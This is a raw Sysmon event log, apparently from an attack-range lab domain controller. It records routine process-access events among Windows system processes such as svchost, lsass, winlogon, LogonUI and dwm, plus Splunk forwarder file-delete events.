12:24:43.427{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440780Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.427{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440779Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.427{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440778Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.426{42DC5269-CE96-6086-0B00-00000000BA01}6286328C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440777Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.426{42DC5269-CE99-6086-1500-00000000BA01}12006856C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440776Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.264{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C528-00000000BA01}6920C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440775Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.262{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C528-00000000BA01}6920C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440774Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.261{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C528-00000000BA01}6920C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440773Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.252{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=2700380D108FEF39C244D8EDABCE9FD4,SHA256=68BB216C3D4A1D1D4141565071B200632F80852BCE943F4A4D7BC7E8095BAA25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440772Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.252{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FA88F83F80696BC641D2FA46E6C24AC,SHA256=74A8256937D943F5CD732240D6C7F10086C2B5F775E71B418BBDBE99C8F8DC43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440771Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.250{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=FE6DE603F387F83AD0CF8CEA8761B976,SHA256=45A83FD4470248F8C83D7BE817EA759F86235BF7D1837E64D04C31772759FCF1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440770Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.193{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440769Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.193{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440768Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.192{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440767Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.192{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2A00-00000000BA01}2900C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440766Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.188{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440765Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.171{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440764Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.171{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440763Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.171{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440762Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.169{42DC5269-CE99-6086-1500-00000000BA01}12006856C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C528-00000000BA01}6920C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440761Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.170{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440760Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.169{42DC5269-CE99-6086-1500-00000000BA01}12001256C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C528-00000000BA01}6920C:\Windows\system32\dwm.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440759Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.145{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440758Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.144{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440757Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.144{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440756Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.144{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440755Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.143{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440754Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 